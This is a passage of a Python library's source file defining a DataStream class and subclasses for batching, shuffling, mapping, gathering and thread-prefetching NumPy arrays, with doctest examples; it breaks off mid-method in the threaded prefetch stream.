>>> stream = DataStream.generator(data_generator)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4 5] [ 9 16 25]
Transforming Data Streams
=========================
A :class:`DataStream` instance can be transformed into another data stream.
To select a subset of the arrays within each mini-batch, or re-order the
arrays, you may:
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> # note we shall select [x, z, x]
>>> stream = DataStream.arrays([x, y, z], batch_size=3).select([0, 2, 0])
>>> for [a, b, c] in stream:
... print(a, b, c)
[0 1 2] [10 11 12] [0 1 2]
[3 4] [13 14] [3 4]
To transform the arrays within each mini-batch by a mapper function,
you may:
>>> def mapper(x, y):
... return x + y
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a] in stream:
... print(a)
[5 7 9]
[11 13]
or you may return a tuple / list of arrays:
>>> def mapper(x, y):
... return x + y, x * y # or return [x + y, x * y]
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a, b] in stream:
... print(a, b)
[5 7 9] [ 0 6 14]
[11 13] [24 36]
To pre-fetch from a time-consuming data stream in background thread
(which is necessary when using a slow mapper), you may:
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> with stream.threaded(prefetch=2) as prefetch_stream:
... for [x] in prefetch_stream:
... print(x)
[0 1 2]
[3 4]
"""
def __init__(self,
batch_size: Optional[int] = None,
array_count: Optional[int] = None,
data_shapes: Optional[Tuple[ArrayShape, ...]] = None,
data_length: Optional[int] = None,
random_state: Optional[np.random.RandomState] = None):
"""
Construct a :class:`DataStream`.
Args:
batch_size: The number of data within each mini-batch.
array_count: The number of arrays within each mini-batch.
data_shapes: The data shapes (excluding the batch axis).
data_length: The total number of data.
random_state: The NumPy random state instance.
Raises:
ValueError: If `len(data_shapes) != array_count`.
>>> stream = DataStream(data_shapes=((), (3, 5)), array_count=3)
Traceback (most recent call last):
...
ValueError: len(data_shapes) != array_count: data_shapes ((), (3, 5)) vs array_count 3
"""
if batch_size is not None:
batch_size = int(batch_size)
if array_count is not None:
array_count = int(array_count)
if data_shapes is not None:
data_shapes = to_data_shapes(data_shapes)
if array_count is None:
array_count = len(data_shapes)
elif array_count != len(data_shapes):
raise ValueError(f'len(data_shapes) != array_count: '
f'data_shapes {data_shapes} vs '
f'array_count {array_count}')
if data_length is not None:
data_length = int(data_length)
if random_state is not None and not \
isinstance(random_state, np.random.RandomState):
raise TypeError(f'`random_state` is not np.random.RandomState: '
f'{random_state!r}')
if data_length is not None and batch_size is not None:
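            # ceiling division: a final incomplete mini-batch still counts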
batch_count = int((data_length + batch_size - 1) // batch_size)
else:
batch_count = None
self._batch_size = batch_size
self._batch_count = batch_count
self._array_count = array_count
self._data_shapes = data_shapes
self._data_length = data_length
self._random_state = random_state
self._active_iterator = None
self._auto_close_iterator_warning_printed = False
def __iter__(self) -> GeneratorIterator[ArrayTuple]:
"""
Iterate through the mini-batches.
        Note that if a previous iterator is not closed before a new one is
        obtained, the previous iterator will be closed automatically, and a
        warning will be printed to the console (only once).
"""
if self._active_iterator is not None:
self._active_iterator.close()
self._active_iterator = None
if not self._auto_close_iterator_warning_printed:
warnings.warn(
f'Another iterator of the DataStream {self!r} is still '
f'active, will close it automatically. If you did not '
f'exhaust the iterator, remember to call `close()` on it.',
UserWarning,
)
self._auto_close_iterator_warning_printed = True
def make_generator():
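            # wrap the underlying mini-batch generator so that the active
            # iterator slot is cleared once it is exhausted or closed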
g = self._minibatch_iterator()
try:
yield from g
finally:
self._active_iterator = None
self._active_iterator = GeneratorIterator(make_generator())
return self._active_iterator
def __len__(self):
"""
Get the total number of data.
        If a data stream reports this number (i.e., it is not None), then it
        equals the sum of the array lengths from all mini-batches in one epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> len(stream)
5
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> len(stream)
3
Raises:
RuntimeError: If a data stream cannot report this number,
i.e., `data_length` is None.
>>> def g():
... yield np.arange(3)
>>> stream = DataStream.generator(g)
>>> stream.data_length is None
True
>>> len(stream)
Traceback (most recent call last):
...
RuntimeError: stream data length is not available
"""
ret = self.data_length
if ret is None:
raise RuntimeError(f'stream data length is not available')
return ret
@property
def batch_size(self) -> Optional[int]:
"""
Get the batch size of this data stream.
If a data stream reports this number (i.e., being not None), then the
actual length of each mini-batch is guaranteed to be NO MORE THAN this.
>>> x = np.random.normal(size=[5, 4])
>>> stream = DataStream.arrays([x], batch_size=3)
>>> stream.batch_size
3
"""
return self._batch_size
@property
def array_count(self) -> Optional[int]:
"""
Get the count of arrays within each mini-batch.
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.array_count
2
"""
return self._array_count
@property
def data_shapes(self) -> Optional[Tuple[ArrayShape, ...]]:
"""
Get the data shapes.
        Data shapes are the shapes of the mini-batch arrays without the batch axis.
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.data_shapes
((4,), (3, 2))
"""
return self._data_shapes
@property
def data_length(self) -> Optional[int]:
"""
Get the total number of data.
        If a data stream reports this number (i.e., it is not None), then it
        equals the sum of the array lengths from all mini-batches in one epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> stream.data_length
5
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> stream.data_length
3
"""
return self._data_length
@property
def batch_count(self) -> Optional[int]:
"""
Get the total number of batches in an epoch.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> stream.batch_count
2
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> stream.batch_count
1
"""
return self._batch_count
@property
def random_state(self) -> Optional[np.random.RandomState]:
"""Get the NumPy random state associated with this data stream."""
return self._random_state
def copy(self, **kwargs):
"""
Get a copy of this data stream.
You may override some of the construction arguments by specifying
        named arguments via :param:`kwargs`. However, some arguments may
        not be overridable (depending on the implementation of subclasses).
>>> x = np.arange(5, dtype=np.int32)
>>> stream = DataStream.arrays([x], batch_size=3)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4]
>>> stream2 = stream.copy(batch_size=4)
>>> isinstance(stream2, ArraysDataStream)
True
>>> for [a] in stream2:
... print(a)
[0 1 2 3]
[4]
Args:
            \\**kwargs: The overridden construction arguments.
Returns:
The copied data stream.
"""
raise NotImplementedError()
def _copy_helper(self, attrs: Iterable[str], **kwargs):
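        # Helper for `copy()`: any construction argument not overridden via
        # `kwargs` is filled in from the corresponding attribute of `self`.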
for attr in attrs:
kwargs.setdefault(attr, getattr(self, attr))
return self.__class__(**kwargs)
def _minibatch_iterator(self) -> Generator[ArrayTuple, None, None]:
raise NotImplementedError()
def get_arrays(self, max_batch: Optional[int] = None) -> Tuple[np.ndarray, ...]:
"""
        Collect all mini-batches into NumPy arrays.
>>> x = np.arange(0, 5, dtype=np.int32)
>>> stream = DataStream.arrays([x], batch_size=3).map(lambda t: t ** 2)
>>> arrays = stream.get_arrays()
>>> len(arrays)
1
>>> print(arrays[0])
[ 0 1 4 9 16]
>>> arrays = stream.get_arrays(max_batch=1)
>>> len(arrays)
1
>>> print(arrays[0])
[0 1 4]
>>> arrays = stream.get_arrays(max_batch=0)
>>> len(arrays)
1
>>> print(arrays[0])
[]
Args:
max_batch: If specified, will take at most this number of batches.
Returns:
The collected arrays.
Raises:
            RuntimeError: If this data stream is empty.
>>> def g():
... if False:
... yield ()
>>> stream = DataStream.generator(g)
>>> stream.get_arrays()
Traceback (most recent call last):
...
RuntimeError: empty data stream cannot be converted to arrays
"""
arrays_buf = []
g = iter(self)
try:
try:
batch = next(g)
except StopIteration:
raise RuntimeError(
'empty data stream cannot be converted to arrays')
try:
arrays_buf = [[to_number_or_numpy(arr)] for arr in batch]
batch_index = 1
while max_batch is None or batch_index < max_batch:
batch = next(g)
for i, arr in enumerate(batch):
arrays_buf[i].append(to_number_or_numpy(arr))
batch_index += 1
if max_batch == 0:
arrays_buf = [[array_buf[0][:0]]
for array_buf in arrays_buf]
except StopIteration:
pass
return tuple(np.concatenate(array_buf) for array_buf in arrays_buf)
finally:
g.close()
def to_arrays_stream(self,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = NOT_SET
) -> 'ArraysDataStream':
"""
        Convert this data stream to an arrays stream.
By default, the original batch size will be preserved:
>>> stream = DataStream.int_seq(5, batch_size=3).map(lambda x: x ** 2)
>>> isinstance(stream, MapperDataStream)
True
>>> stream2 = stream.to_arrays_stream()
>>> isinstance(stream2, ArraysDataStream)
True
>>> for [a] in stream2:
... print(a)
[0 1 4]
[ 9 16]
You may also override the batch size:
>>> stream3 = stream.to_arrays_stream(batch_size=4)
>>> for [a] in stream3:
... print(a)
[0 1 4 9]
[16]
Args:
batch_size: The number of data within each mini-batch.
If not specified, will use the original batch size if possible.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state : The NumPy random state instance.
If not specified, will use the original random state instance.
Returns:
The constructed array stream.
Raises:
ValueError: If the batch size is neither specified, nor can it
be determined according to the original batch size.
>>> def g():
... yield np.arange(3)
>>> stream = DataStream.generator(g)
>>> stream.to_arrays_stream()
Traceback (most recent call last):
...
ValueError: `batch_size` must be specified
"""
if batch_size is NOT_SET:
batch_size = self.batch_size
if batch_size is None:
raise ValueError('`batch_size` must be specified')
if random_state is NOT_SET:
random_state = self.random_state
return ArraysDataStream(
self.get_arrays(), batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
# -------- here starts the factory methods --------
@staticmethod
def arrays(arrays: Iterable[Array],
batch_size: int,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None
) -> 'ArraysDataStream':
"""
Construct an arrays stream, i.e., :class:`ArraysDataStream`.
>>> x = np.arange(5, dtype=np.int32)
>>> y = x ** 2
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
[3 4] [ 9 16]
You may shuffle the data by setting `shuffle = True`:
>>> np.random.seed(1234)
>>> stream = DataStream.arrays([x, y], batch_size=3, shuffle=True)
>>> for [a, b] in stream:
... print(a, b)
[4 0 1] [16 0 1]
[2 3] [4 9]
You may discard the last incomplete mini-batch by setting
`skip_incomplete = True`:
>>> stream = DataStream.arrays(
... [x, y], batch_size=3, skip_incomplete=True)
>>> for [a, b] in stream:
... print(a, b)
[0 1 2] [0 1 4]
Args:
arrays: A sequence of numpy-like arrays.
These arrays should be at least 1-d, and the size of the
first axis must be identical.
batch_size: The number of data within each mini-batch.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state: The numpy random state instance.
Returns:
The arrays stream.
"""
return ArraysDataStream(
arrays=arrays,
batch_size=batch_size,
shuffle=shuffle,
skip_incomplete=skip_incomplete,
random_state=random_state
)
@staticmethod
def int_seq(start: int,
stop: int = None,
step: int = None,
*,
dtype=np.int32,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None
) -> 'IntSeqDataStream':
"""
        Construct an integer sequence stream, i.e., :class:`IntSeqDataStream`.
To construct various integer sequences:
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> for [a] in stream:
... print(a)
[0 1 2]
[3 4]
>>> stream = DataStream.int_seq(2, 11, 2, batch_size=3)
>>> for [a] in stream:
... print(a)
[2 4 6]
[ 8 10]
>>> stream = DataStream.int_seq(-5, step=-1, batch_size=3)
>>> for [a] in stream:
... print(a)
[ 0 -1 -2]
[-3 -4]
>>> stream = DataStream.int_seq(-2, -11, -2, batch_size=3)
>>> for [a] in stream:
... print(a)
[-2 -4 -6]
[ -8 -10]
You may shuffle the sequence by setting `shuffle = True`:
>>> np.random.seed(1234)
>>> stream = DataStream.int_seq(5, batch_size=3, shuffle=True)
>>> for [a] in stream:
... print(a)
[4 0 1]
[2 3]
You may discard the last incomplete mini-batch by setting
`skip_incomplete = True`:
>>> stream = DataStream.int_seq(5, batch_size=3, skip_incomplete=True)
>>> for [a] in stream:
... print(a)
[0 1 2]
Args:
start: If `stop` is specified, this is the starting number.
Otherwise this is the ending number, and the starting
number is 0.
stop: The ending number.
step: The sequence incremental step.
dtype: The NumPy data type.
batch_size: The number of data within each mini-batch.
shuffle: Whether or not to shuffle data?
skip_incomplete: Whether or not to exclude the last mini-batch
if it is incomplete?
random_state: The numpy random state instance.
Returns:
The integer sequence stream.
"""
return IntSeqDataStream(
start=start, stop=stop, step=step, dtype=dtype,
batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state,
)
@staticmethod
def gather(streams: Iterable['DataStream'],
random_state: Optional[np.random.RandomState] = None
) -> 'GatherDataStream':
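        """
        Gather multiple data streams into one, i.e., :class:`GatherDataStream`.
        Each mini-batch of the gathered stream is the concatenation of the
        corresponding mini-batches from all source streams.
        """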
return GatherDataStream(streams=streams, random_state=random_state)
@staticmethod
def generator(f: Callable[[], ArraysOrArrayGenerator]
) -> 'GeneratorFactoryDataStream':
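        """
        Construct a data stream from a mini-batch generator factory function,
        i.e., :class:`GeneratorFactoryDataStream`.  `f` should return a
        generator that yields an array, or a tuple / list of arrays, for each
        mini-batch.
        """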
return GeneratorFactoryDataStream(f)
# -------- here starts the transforming methods --------
def map(self,
mapper: Callable[..., ArraysOrArray],
preserve_shapes: bool = False
) -> 'MapperDataStream':
"""
Transform this data stream via a mapper function.
To return a single array:
>>> def mapper(x, y):
... return x + y
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a] in stream:
... print(a)
[5 7 9]
[11 13]
To return a tuple / list of arrays:
>>> def mapper(x, y):
... return x + y, x * y # or return [x + y, x * y]
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3).map(mapper)
>>> for [a, b] in stream:
... print(a, b)
[5 7 9] [ 0 6 14]
[11 13] [24 36]
Args:
mapper: The mapper function.
preserve_shapes: User specified hint, whether or not the
`mapper` preserves the array count and shapes within
each mini-batch? This hint might benefit further
transformation. By default :obj:`False`.
>>> def mapper(x, y):
... return x ** 2, y - 1
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 3, 2])
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.array_count, stream.data_shapes
(2, ((4,), (3, 2)))
>>> stream2 = stream.map(mapper)
>>> stream2.array_count, stream2.data_shapes
(None, None)
>>> stream3 = stream.map(mapper, preserve_shapes=True)
>>> stream3.array_count, stream3.data_shapes
(2, ((4,), (3, 2)))
Returns:
The transformed data stream.
"""
return MapperDataStream(
source=self, mapper=mapper, preserve_shapes=preserve_shapes)
def threaded(self, prefetch: int = 5) -> 'ThreadingDataStream':
"""
Construct a data stream that prefetches this data stream in a
background thread.
>>> stream = DataStream.int_seq(5, batch_size=3)
>>> with stream.threaded() as prefetch_stream:
... for [x] in prefetch_stream:
... print(x)
[0 1 2]
[3 4]
Args:
prefetch: Number of mini-batches to prefetch in background.
Returns:
The background data stream.
"""
return ThreadingDataStream(self, prefetch=prefetch)
def select(self, indices: Iterable[int]) -> 'MapperDataStream':
"""
Construct a data stream that selects a subset of the arrays within
each mini-batch, or re-order the arrays.
Given the following source data stream:
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> source = DataStream.arrays([x, y, z], batch_size=3)
We shall select [x, z, x] from source:
>>> stream = source.select([0, 2, 0])
>>> for [a, b, c] in stream:
... print(a, b, c)
[0 1 2] [10 11 12] [0 1 2]
[3 4] [13 14] [3 4]
The various data stream properties are also properly inherited:
>>> x = np.random.normal(size=[5, 4])
>>> y = np.random.normal(size=[5, 2, 3])
>>> source = DataStream.arrays([x, y], batch_size=3)
>>> stream = source.select([-1, 0, 1])
>>> stream.array_count
3
>>> stream.data_shapes
((2, 3), (4,), (2, 3))
>>> stream.data_length
5
Args:
indices: The indices of the arrays to select within each mini-batch.
Returns:
The transformed data stream.
Raises:
IndexError: If `self.array_count` is reported, and any index
                in `indices` is out of this range.
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> stream = DataStream.arrays([x, y], batch_size=3)
>>> stream.select([0, 1, 2])
Traceback (most recent call last):
...
IndexError: array index out of range
Note if `self.array_count` is not reported (i.e., is None),
then :class:`IndexError` will not be raised until iterated.
>>> def mapper(x, y, z):
... return x + y, y - z
>>> x = np.arange(0, 5, dtype=np.int32)
>>> y = np.arange(5, 10, dtype=np.int32)
>>> z = np.arange(10, 15, dtype=np.int32)
>>> stream = DataStream.arrays([x, y, z], batch_size=3). \
map(mapper).select([0, 1, 2])
>>> for batch in stream:
... print(batch)
Traceback (most recent call last):
...
IndexError: tuple index out of range
"""
# validate the argument
indices = tuple(indices)
if self.array_count is not None:
for i in indices:
if i < -self.array_count or i >= self.array_count:
raise IndexError(f'array index out of range')
# prepare for the mapper
def mapper(*arrays):
return tuple(arrays[j] for j in indices)
# construct the mapper data stream
if self.data_shapes is not None:
data_shapes = tuple(self.data_shapes[i] for i in indices)
else:
data_shapes = None
array_count = len(indices)
return MapperDataStream(
source=self, mapper=mapper, data_shapes=data_shapes,
array_count=array_count
)
class ArraysDataStream(DataStream):
"""NumPy arrays data stream."""
def __init__(self,
arrays: Iterable[Array],
batch_size: int,
shuffle: bool,
skip_incomplete: bool,
random_state: Optional[np.random.RandomState] = None):
# validate parameters
arrays = tuple(arrays)
if not arrays:
raise ValueError('`arrays` must not be empty.')
for a in arrays:
if not hasattr(a, 'shape'):
                raise ValueError('`arrays` must be numpy-like arrays.')
if len(a.shape) < 1:
raise ValueError('`arrays` must be at least 1-d arrays.')
data_shapes = to_data_shapes(arr.shape[1:] for arr in arrays)
array_length = len(arrays[0])
for a in arrays[1:]:
if len(a) != array_length:
raise ValueError('`arrays` must have the same length.')
if skip_incomplete:
data_length = array_length // batch_size * batch_size
else:
data_length = array_length
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=len(data_shapes),
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state,
)
self._arrays = map_to_tuple(to_readonly_array, arrays)
self._indices_buffer = None # type: Array
self._shuffle = bool(shuffle)
self._skip_incomplete = bool(skip_incomplete)
@property
def the_arrays(self):
"""Get the underlying NumPy arrays without copy."""
return self._arrays
@property
def shuffle(self) -> bool:
"""Whether or not to shuffle data?"""
return self._shuffle
@property
def skip_incomplete(self) -> bool:
"""Whether or not to exclude the last mini-batch if it is incomplete?"""
return self._skip_incomplete
def _minibatch_iterator(self) -> Generator[ArrayTuple, None, None]:
# shuffle the source arrays if necessary
if self.shuffle:
if self._indices_buffer is None:
indices_count = len(self._arrays[0])
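                # pick an index dtype just wide enough for the data length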
t = np.int32 if indices_count < (1 << 31) else np.int64
self._indices_buffer = np.arange(indices_count, dtype=t)
rng = self._random_state or np.random
rng.shuffle(self._indices_buffer)
def get_slice(s):
return tuple(
a[self._indices_buffer[s]]
for a in self.the_arrays
)
else:
def get_slice(s):
return tuple(a[s] for a in self.the_arrays)
        # now iterate through the mini-batches
for batch_s in minibatch_slices_iterator(
length=self.data_length,
batch_size=self.batch_size,
skip_incomplete=self.skip_incomplete):
yield get_slice(batch_s)
def copy(self, **kwargs):
return self._copy_helper(
('batch_size', 'shuffle', 'skip_incomplete', 'random_state'),
arrays=self._arrays,
**kwargs
)
class IntSeqDataStream(DataStream):
"""Integer sequence data stream."""
def __init__(self,
start: int,
stop: int = None,
step: int = None,
*,
dtype=np.int32,
batch_size: int = NOT_SET,
shuffle: bool = False,
skip_incomplete: bool = False,
random_state: Optional[np.random.RandomState] = None):
# validate the arguments
start = int(start)
if stop is None:
stop = start
start = 0
else:
stop = int(stop)
if step is None:
step = 1
else:
step = int(step)
dtype = np.dtype(dtype)
if batch_size is NOT_SET:
raise ValueError('`batch_size` is required.')
# construct the int sequence
seq = np.arange(start=start, stop=stop, step=step, dtype=dtype)
if skip_incomplete:
data_length = len(seq) // batch_size * batch_size
else:
data_length = len(seq)
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=1,
data_shapes=((),),
data_length=data_length,
random_state=random_state,
)
self._start = start
self._stop = stop
self._step = step
self._dtype = dtype
self._seq = seq
self._shuffle = bool(shuffle)
self._skip_incomplete = bool(skip_incomplete)
@property
def start(self) -> int:
"""Get the starting number."""
return self._start
@property
def stop(self) -> int:
"""Get the ending number."""
return self._stop
@property
def step(self) -> int:
"""Get the sequence incremental step."""
return self._step
@property
def dtype(self) -> np.dtype:
"""Get the NumPy data type."""
return self._dtype
@property
def shuffle(self) -> bool:
"""Whether or not to shuffle data?"""
return self._shuffle
@property
def skip_incomplete(self) -> bool:
"""Whether or not to exclude the last mini-batch if it is incomplete?"""
return self._skip_incomplete
def _minibatch_iterator(self):
if self.shuffle:
rng = self._random_state or np.random
rng.shuffle(self._seq)
for batch_s in minibatch_slices_iterator(
length=self.data_length,
batch_size=self.batch_size,
skip_incomplete=self.skip_incomplete):
yield (to_readonly_array(self._seq[batch_s]),)
def copy(self, **kwargs):
return self._copy_helper(
('dtype', 'batch_size', 'shuffle', 'skip_incomplete',
'random_state'),
start=self.start, stop=self.stop, step=self.step,
**kwargs
)
class UserGeneratorDataStream(DataStream):
"""Base class for data streams with user generated data."""
def _validate_batch(self, batch):
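        # Check a user-produced mini-batch against the declared batch_size,
        # array_count and data_shapes of this stream, raising ValueError on
        # any mismatch, and normalize it into a tuple of arrays.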
batch = ensure_batch_is_tuple(batch)
if self.batch_size is not None and batch:
batch_size = len(batch[0])
if batch_size > self.batch_size:
raise ValueError(
f'batch size of the mapper output is not '
f'valid: expected <= {self.batch_size}, '
f'got {batch_size}'
)
for i, b in enumerate(batch[1:], 1):
if len(b) != batch_size:
raise ValueError(
f'batch size of the {i}-th mapper output != '
f'the first output'
)
if self.array_count is not None and len(batch) != self.array_count:
raise ValueError(f'user generator returned invalid number of '
f'arrays: expected {self.array_count}, got '
f'{len(batch)}')
if self.data_shapes is not None:
for i, (x, y) in enumerate(zip(batch, self.data_shapes)):
if x.shape[1:] != y:
raise ValueError(
f'data shape of the {i}-th mapper output is not '
f'valid: expected {y}, got {x.shape[1:]}'
)
return batch
class GeneratorFactoryDataStream(UserGeneratorDataStream):
"""Data stream that turns a generator factory function into a stream."""
def __init__(self, factory: Callable[[], ArraysOrArrayGenerator]):
super().__init__()
self._factory = factory
@property
def factory(self) -> Callable[[], Generator[Sequence[Array], None, None]]:
"""
Get the generator factory function (i.e., function that returns a
mini-batch arrays generator).
"""
return self._factory
def _minibatch_iterator(self):
g = self._factory()
try:
for batch in g:
yield self._validate_batch(batch)
finally:
if hasattr(g, 'close'): # pragma: no cover
g.close()
def copy(self, **kwargs):
return self._copy_helper((), factory=self.factory, **kwargs)
class GatherDataStream(DataStream):
"""Data stream that gathers multiple streams into one."""
def __init__(self,
streams: Iterable[DataStream],
random_state: Optional[np.random.RandomState] = NOT_SET):
# validate the streams
streams = tuple(streams)
if not streams:
raise ValueError('At least one data stream should be specified.')
for i, stream in enumerate(streams):
if not isinstance(stream, DataStream):
raise TypeError(f'The {i}-th element of `streams` is not an '
f'instance of DataStream: {stream}.')
# inspect the properties of the data streams
batch_size = NOT_SET
array_count = 0
data_shapes = []
data_length = NOT_SET
for i, stream in enumerate(streams):
# check the batch size
if stream.batch_size is not None:
if batch_size is NOT_SET:
batch_size = stream.batch_size
elif batch_size != stream.batch_size:
raise ValueError(
f'Inconsistent batch size among the specified streams: '
f'encountered {stream.batch_size} at the {i}-th '
f'stream, but has already encountered {batch_size} '
f'before.'
)
# check the array count
if array_count is not None:
if stream.array_count is not None:
array_count += stream.array_count
else:
array_count = None
# check the data shapes
if data_shapes is not None:
if stream.data_shapes is not None:
data_shapes.extend(stream.data_shapes)
else:
data_shapes = None
# check the data length
if stream.data_length is not None:
if data_length is NOT_SET:
data_length = stream.data_length
elif data_length != stream.data_length:
raise ValueError(
f'Inconsistent data length among the specified '
f'streams: encountered {stream.data_length} at '
f'the {i}-th stream, but has already encountered '
f'{data_length} before.'
)
# check the random state
if stream.random_state is not None and random_state is NOT_SET:
random_state = stream.random_state
if batch_size is NOT_SET:
batch_size = None
if data_shapes is not None:
data_shapes = tuple(data_shapes)
if data_length is NOT_SET:
data_length = None
if random_state is NOT_SET:
random_state = None
# construct the instance
super().__init__(
batch_size=batch_size,
array_count=array_count,
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state
)
self._streams = streams
@property
def streams(self) -> Tuple[DataStream, ...]:
"""Get the gathered data streams."""
return self._streams
def _minibatch_iterator(self):
iterators = [iter(s) for s in self._streams]
try:
for batches in zip(*iterators):
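                # concatenate the per-stream batch tuples into one flat tuple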
yield sum([tuple(b) for b in batches], ())
finally:
for i in iterators:
if hasattr(i, 'close'): # pragma: no cover
i.close()
def copy(self, **kwargs):
return self._copy_helper(('random_state',), streams=self.streams, **kwargs)
class MapperDataStream(UserGeneratorDataStream):
"""Data stream that transforms the source stream via a mapper function."""
def __init__(self,
source: DataStream,
mapper: Callable[..., ArraysOrArray],
batch_size: Optional[int] = NOT_SET,
array_count: Optional[int] = NOT_SET,
data_shapes: Optional[Tuple[ArrayShape, ...]] = NOT_SET,
data_length: Optional[int] = NOT_SET,
random_state: Optional[np.random.RandomState] = NOT_SET,
preserve_shapes: bool = False):
# validate the arguments
if not isinstance(source, DataStream):
raise TypeError(f'`source` is not a DataStream: {source!r}')
if batch_size is NOT_SET:
batch_size = source.batch_size
if array_count is NOT_SET:
if preserve_shapes:
array_count = source.array_count
else:
array_count = None
if data_shapes is NOT_SET:
if preserve_shapes:
data_shapes = source.data_shapes
else:
data_shapes = None
if data_length is NOT_SET:
data_length = source.data_length
if random_state is NOT_SET:
random_state = source.random_state
super().__init__(
batch_size=batch_size,
array_count=array_count,
data_shapes=data_shapes,
data_length=data_length,
random_state=random_state
)
self._source = source
self._mapper = mapper
@property
def source(self) -> DataStream:
"""Get the source data stream."""
return self._source
def _minibatch_iterator(self):
g = iter(self._source)
try:
for batch in g:
yield self._validate_batch(
self._mapper(*ensure_batch_is_tuple(batch)))
finally:
g.close()
def copy(self, **kwargs):
return self._copy_helper(
('batch_size', 'array_count', 'data_shapes', 'data_length',
'random_state'),
source=self._source,
mapper=self._mapper,
**kwargs
)
class ThreadingDataStream(DataStream, AutoInitAndCloseable):
"""
Data stream that prefetches mini-batches from the source stream
in a background thread.
"""
EPOCH_END = object()
"""Object to mark an ending position of an epoch."""
class ErrorBox(object):
"""Class to carry an error."""
def __init__(self, error):
self.error = error
def __init__(self,
source: DataStream,
prefetch: int):
# validate the parameters
if not isinstance(source, DataStream):
raise TypeError(f'`source` is not a DataStream: {source!r}')
prefetch = int(prefetch)
if prefetch < 1:
raise ValueError('`prefetch` must be at least 1')
# construct the instance
super().__init__(
batch_size=source.batch_size,
array_count=source.array_count,
data_shapes=source.data_shapes,
data_length=source.data_length,
random_state=source.random_state,
)
self._source = source
self._prefetch = prefetch
# internal states for background worker
self._worker = None # type: Thread
self._batch_queue = None # type: Queue
self._epoch_counter = None # counter for tracking the active epoch
self._stopping = None
self._worker_alive = None
self._worker_ready_sem = None
@property
def source(self) -> DataStream:
"""Get the source data stream."""
return self._source
@property
def prefetch(self) -> int:
"""Get the number of mini-batches to prefetch in background."""
return self._prefetch
def _worker_func(self):
active_epoch = self._epoch_counter
self._worker_alive = True
self._worker_ready_sem.release()
try:
while not self._stopping:
# iterate through the mini-batches in the current epoch
g = iter(self.source)
try:
for batch in g:
if self._stopping or active_epoch < self._epoch_counter:
break
self._batch_queue.put((active_epoch, batch))
finally:
g.close()
# put the epoch ending mark into the queue
if not self._stopping:
self._batch_queue.put((active_epoch, self.EPOCH_END))
# move to the next epoch
active_epoch += 1
except Exception as ex: # pragma: no cover
getLogger(__name__).warning(
f'{self.__class__.__qualname__} exited because of error',
exc_info=True
)
self._batch_queue.put((active_epoch, self.ErrorBox(ex)))
raise
finally:
self._worker_alive = False
def _init(self):
# prepare for the worker states
self._batch_queue = Queue(self.prefetch)
self._epoch_counter = 0
self._stopping = False
self._worker_ready_sem = Semaphore(value=0)
# create and start the worker
self._worker = Thread(target=self._worker_func)
self._worker.daemon = True
self._worker.start()
# wait for the thread to show up
self._worker_ready_sem.acquire()
def _close(self):
try:
# prevent the worker thread from further work
self._stopping = True
# exhaust all remaining queue items to notify the background worker
while not self._batch_queue.empty():
self._batch_queue.get()
# wait until the worker exit
self._worker.join()
finally:
self._worker = None
self._batch_queue = None
self._worker_ready_sem = None
self._initialized = False
def _minibatch_iterator(self):
self.init()
try:
# iterate through one epoch
while self._worker_alive or not self._batch_queue.empty():
epoch, payload = self._batch_queue.get()
if epoch < self._epoch_counter:
# we've got a remaining item from the last epoch, skip it
pass
elif epoch > self._epoch_counter: # pragma: no cover
# we've accidentally got an item from the future epoch
# it should be a bug, and we shall report it
raise RuntimeError('Unexpected entry from future epoch.')
elif payload is self.EPOCH_END:
# we've got the epoch ending mark for the current epoch,
# so we should break the loop
break
